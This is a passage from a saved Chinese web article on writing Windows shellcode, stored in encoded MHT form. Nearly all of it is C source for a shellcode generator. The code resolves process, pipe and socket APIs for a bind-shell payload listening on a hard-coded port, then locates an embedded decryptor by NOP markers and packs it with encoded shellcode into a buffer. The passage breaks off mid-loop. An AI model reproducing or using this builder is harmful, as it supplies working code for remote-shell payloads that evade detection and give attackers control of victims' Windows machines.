
📄 关于windows下shellcode编写的一点思考.mht

                        =
8192=D7=E3=B9=BB=A3=BF<BR>#define&nbsp;&nbsp;MAX_api_strlen 0x400&nbsp;=20
                        =
&nbsp;//APIstr=D7=D6=B7=FB=B4=AE=B5=C4=B3=A4=B6=C8<BR>#define&nbsp;&nbsp;=
API_endstr&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;"strend"//API=BD=E1=CE=B2=B1=EA=BC=C7=D7=D6=B7=FB=B4=AE=
&nbsp; &nbsp;=20
                        =
<BR>#define&nbsp;&nbsp;API_endstrlen&nbsp;&nbsp;0x06&nbsp;=20
                        &nbsp; =
//=B1=EA=BC=C7=D7=D6=B7=FB=B4=AE=B3=A4=B6=C8<BR><BR>#define PROC_BEGIN=20
                        __asm&nbsp;&nbsp;_emit 0x90 =
__asm&nbsp;&nbsp;_emit 0x90=20
                        __asm&nbsp;&nbsp;_emit 0x90 =
__asm&nbsp;&nbsp;_emit=20
                        0x90\<BR>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; =
__asm&nbsp;&nbsp;_emit=20
                        0x90 __asm&nbsp;&nbsp;_emit 0x90 =
__asm&nbsp;&nbsp;_emit=20
                        0x90 __asm&nbsp;&nbsp;_emit 0x90<BR>#define =
PROC_END=20
                        =
PROC_BEGIN<BR>//=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=
=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=
=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=
=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=A3=AD=
=A3=AD=A3=AD=A3=AD=A3=AD<BR>enum{&nbsp;=20
                        &nbsp;&nbsp; &nbsp; //Kernel32<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;_CreatePipe,<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;_CreateProcessA,<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;_CloseHandle,<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;_PeekNamedPipe,<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;_ReadFile,<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;_WriteFile,<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;_ExitProcess,<BR><BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;//WS2_32<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;_socket,<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;_bind,<BR>&nbsp; =

                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;_listen,<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;_accept,<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;_send,<BR>&nbsp; =

                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;_recv,<BR>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =

                        &nbsp;&nbsp; &nbsp;_ioctlsocket,<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;_closesocket,<BR><BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;//=B1=BE=BB=FA=B2=E2=CA=D4User32<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;_MessageBeep,<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;_MessageBoxA,<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;API_num<BR>};<BR><BR>//<BR>//=B4=FA=C2=EB=D5=E2=C0=EF=BF=AA=CA=BC<B=
R>//<BR>int=20
                        __cdecl main(int argc, char=20
                        =
**argv)<BR>{<BR>&nbsp;&nbsp;//shellcode=D6=D0=D2=AA=D3=C3=B5=BD=B5=C4=D7=D6=
=B7=FB=B4=AE<BR>&nbsp;&nbsp;static=20
                        char ApiStr[]=3D"\x1e\x6c"&nbsp;=20
                        &nbsp;//=B6=CB=BF=DA=B5=D8=D6=B7<BR><BR>&nbsp; =
&nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; =
&nbsp;//Kernel32=B5=C4API=BA=AF=CA=FD=C3=FB=B3=C6<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"CreatePipe""\x0"<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"CreateProcessA""\x0"<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"CloseHandle""\x0"<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"PeekNamedPipe""\x0"<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"ReadFile""\x0"<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"WriteFile""\x0"<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"ExitProcess""\x0"<BR><BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;//=C6=E4=CB=FCAPI=D6=D0=D3=C3=B5=BD=B5=C4API<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"wsock32.dll""\x0"<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;"socket""\x0"<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"bind""\x0"<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;"listen""\x0"<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;"accept""\x0"<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"send""\x0"<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;"recv""\x0"<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"ioctlsocket""\x0"<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"closesocket""\x0"<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;//=B1=BE=BB=FA=B2=E2=CA=D4<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"user32.dll""\x0"<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"MessageBeep""\x0"<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"MessageBoxA""\x0"<BR><BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"\x0\x0\x0\x0\x0"<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;"strend";<BR><BR>&nbsp;&nbsp;char&nbsp;&nbsp;*fnbgn_str=3D"\x90\x90=
\x90\x90\x90\x90\x90\x90\x90";&nbsp;&nbsp;//=B1=EA=BC=C7=BF=AA=CA=BC=B5=C4=
=D7=D6=B7=FB=B4=AE<BR>&nbsp;&nbsp;char&nbsp;&nbsp;*fnend_str=3D"\x90\x90\=
x90\x90\x90\x90\x90\x90\x90";&nbsp;&nbsp;//=B1=EA=BC=C7=BD=E1=CA=F8=B5=C4=
=D7=D6=B7=FB=B4=AE<BR><BR>&nbsp;&nbsp;char&nbsp;&nbsp;buff[BUFFSIZE];&nbs=
p;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;//=BB=BA=B3=E5=C7=F8<BR>&nbsp;&nbsp;char&nbsp;&nbsp;sc_buff[sc_BUFF=
SIZE];&nbsp;=20
                        =
&nbsp;//ShellCodes=BB=BA=B3=E5<BR>&nbsp;&nbsp;char&nbsp;&nbsp;*pDcrypt_ad=
dr,<BR>&nbsp;=20
                        &nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;*pSc_addr;<BR><BR>&nbsp;&nbsp;int&nbsp;=20
                        &nbsp;buff_len;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;//=BB=BA=B3=E5=B3=A4=B6=C8<BR>&nbsp;&nbsp;int&nbsp;=20
                        &nbsp;EncCode_len;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; =
&nbsp;//=BC=D3=C3=DC=B1=E0=C2=EB=B4=FA=C2=EB=B3=A4=B6=C8<BR>&nbsp;&nbsp;i=
nt&nbsp;=20
                        &nbsp;Sc_len;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;//=D4=AD=CA=BCShellCode=B5=C4=B3=A4=B6=C8<BR><BR>&nbsp;=
&nbsp;int&nbsp;=20
                        &nbsp;&nbsp; &nbsp;=20
                        i,k;<BR>&nbsp;&nbsp;unsigned&nbsp;&nbsp;char=20
                        =
ch;<BR><BR>&nbsp;&nbsp;//<BR>&nbsp;&nbsp;//=BB=F1=B5=C3DecryptSc()=B5=D8=D6=
=B7=A3=AC=BD=E2=C2=EB=BA=AF=CA=FD=B5=C4=B5=D8=D6=B7=A3=AC=C8=BB=BA=F3=CB=D1=
=CB=F7MAX_Enc_Len=D7=D6=BD=DA=A3=AC=B2=E9=D5=D2=B1=EA=BC=C7=BF=AA=CA=BC=B5=
=C4=D7=D6=B7=FB=B4=AE<BR>&nbsp;&nbsp;//=BB=F1=B5=C3=D5=E6=D5=FD=B5=C4=BD=E2=
=C2=EB=BB=E3=B1=E0=B4=FA=C2=EB=B5=C4=BF=AA=CA=BC=B5=D8=D6=B7=A3=ACMAX_Enc=
_Len=B6=A8=D2=E5=CE=AA1024=D7=D6=BD=DA=D2=BB=B0=E3=D5=E2=D2=D1=BE=AD=D7=E3=
=B9=BB=C1=CB=A3=AC=C8=BB=BA=F3=BD=AB=D5=E2<BR>&nbsp;&nbsp;//=B2=BF=B7=D6=B4=
=FA=C2=EB=BF=BD=B1=B4=C8=EB=B4=FD=CA=E4=B3=F6ShellCode=B5=C4=BB=BA=B3=E5=C7=
=F8=D7=BC=B1=B8=BD=F8=D2=BB=B2=BD=B4=A6=C0=ED<BR>&nbsp;&nbsp;//<BR>&nbsp;=
&nbsp;pDcrypt_addr=3D(char=20
                        =
*)DecryptSc;<BR><BR>&nbsp;&nbsp;//=B6=A8=CE=BB=C6=E4=CA=B5=BC=CA=B5=D8=D6=
=B7=A3=AC=D2=F2=CE=AA=D4=DA=D3=C3Visual=20
                        =
Studio=C9=FA=B3=C9=B5=F7=CA=D4=B0=E6=B1=BE=B5=F7=CA=D4=B5=C4=C7=E9=BF=F6=CF=
=C2=A3=AC=B1=E0=D2=EB=C6=F7=BB=E1=C9=FA=B3=C9=CC=F8=D7=AA=B1=ED=A3=AC<BR>=
&nbsp;&nbsp;//=B4=D3=CC=F8=D7=AA=B1=ED=D6=D0=D2=AA=BC=C6=CB=E3=B5=C3=B3=F6=
=BA=AF=CA=FD=CA=B5=BC=CA=CB=F9=D4=DA=B5=C4=B5=D8=D6=B7=A3=AC=D5=E2=D6=BB=CA=
=C7=CE=AA=C1=CB=B7=BD=B1=E3=D3=C3VC=B5=F7=CA=D4<BR><BR>&nbsp;&nbsp;ch=3D*=
pDcrypt_addr;<BR>&nbsp;&nbsp;if=20
                        (ch=3D=3D0xe9)<BR>&nbsp;&nbsp;{<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;pDcrypt_addr++;<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;i=3D*(int *)pDcrypt_addr;<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;pDcrypt_addr+=3D(i+4);&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;//=B4=CB=CA=B1=D6=B8=CF=F2=BA=AF=CA=FD=B5=C4=CA=B5=BC=CA=B5=D8=D6=B7=
<BR>&nbsp;&nbsp;}<BR>&nbsp;&nbsp;//=D5=D2=B5=BD=BD=E2=C2=EB=B4=FA=C2=EB=B5=
=C4=BF=AA=CA=BC=B2=BF=B7=D6<BR>&nbsp;&nbsp;for(k=3D0;k&lt;MAX_Enc_Len;++k=
)=20
                        =
if(memcmp(pDcrypt_addr+k,fnbgn_str,BEGINSTRLEN)=3D=3D0)=20
                        break;<BR><BR>&nbsp;&nbsp;if (k&lt;MAX_Enc_Len)=20
                        pDcrypt_addr+=3D(k+8);&nbsp;=20
                        =
&nbsp;//=C8=E7=D5=D2=B5=BD=B6=A8=CE=BB=CA=B5=BC=CA=B4=FA=C2=EB=B5=C4=BF=AA=
=CA=BC<BR>&nbsp;&nbsp;else=20
                        <BR>&nbsp;&nbsp;{<BR>&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;//=CF=D4=CA=BE=B4=ED=CE=F3=D0=C5=CF=A2<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;k=3D0;<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;printf("\nNo=20
                        Begin str defined in Decrypt function!Please =
Check=20
                        before go on...\n");<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;return=20
                        =
0;<BR>&nbsp;&nbsp;}<BR><BR>&nbsp;&nbsp;for(k=3D0;k&lt;MAX_Enc_Len;++k)=20
                        =
if(memcmp(pDcrypt_addr+k,fnend_str,ENDSTRLEN)=3D=3D0)=20
                        break;<BR><BR>&nbsp;&nbsp;if (k&lt;MAX_Enc_Len)=20
                        EncCode_len=3Dk;<BR>&nbsp;&nbsp;else=20
                        <BR>&nbsp;&nbsp;{<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;k=3D0;<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;printf("\nNo End=20
                        str defined in Decrypt function!Please=20
                        Check....\n");<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;return=20
                        =
0;<BR>&nbsp;&nbsp;}<BR><BR>&nbsp;&nbsp;memset(buff,nop_CODE,BUFFSIZE);&nb=
sp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;//=BB=BA=B3=E5=C7=F8=CC=EE=B3=E4<BR>&nbsp;&nbsp;memcpy(=
buff+nop_LEN,pDcrypt_addr,EncCode_len);&nbsp;=20
                        &nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;//=B0=D1DecryptSc=B4=FA=C2=EB=B8=B4=D6=C6=BD=F8buff<BR>=
<BR>&nbsp;&nbsp;//<BR>&nbsp;&nbsp;//=B4=A6=C0=EDShellCode=B4=FA=C2=EB,=C8=
=E7=B9=FB=D0=E8=D2=AA=B6=A8=CE=BB=B5=BD=B4=FA=C2=EB=B5=C4=BF=AA=CA=BC<BR>=
&nbsp;&nbsp;//<BR>&nbsp;&nbsp;pSc_addr=3D(char=20
                        *)ShellCodes;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;//shellcode=B5=C4=B5=D8=D6=B7<BR><BR>&nbsp;&nbsp;//=B5=F7=
=CA=D4=D7=B4=CC=AC=CF=C2=B5=C4=BA=AF=CA=FD=B5=D8=D6=B7=B4=A6=C0=ED=A3=AC=B1=
=E3=D3=DA=B5=F7=CA=D4<BR>&nbsp;&nbsp;ch=3D*pSc_addr;<BR>&nbsp;&nbsp;if=20
                        (ch=3D=3D0xe9)<BR>&nbsp;&nbsp;{<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;pSc_addr++;<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;i=3D*(int=20
                        *)pSc_addr;<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;pSc_addr+=3D(i+4);&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;//=B4=CB=CA=B1=D6=B8=CF=F2=BA=AF=CA=FD=B5=C4=CA=B5=BC=CA=B5=D8=D6=B7=
<BR>&nbsp;&nbsp;}<BR><BR>&nbsp;&nbsp;//=C8=E7=B9=FB=D0=E8=D2=AA=B6=A8=CE=BB=
=B5=BD=CA=B5=BC=CAShellCodes()=B5=C4=BF=AA=CA=BC=A3=AC=D5=E2=B8=F6=B0=E6=B1=
=BE=D6=D0=CA=C7=B2=BB=D0=E8=D2=AA=B5=C4<BR>&nbsp;&nbsp;/*<BR>&nbsp;&nbsp;=
for=20
                        (k=3D0;k&lt;MAX_Sc_Len ;++k )=20
                        =
if(memcmp(pSc_addr+k,fnbgn_str,BEGINSTRLEN)=3D=3D0)=20
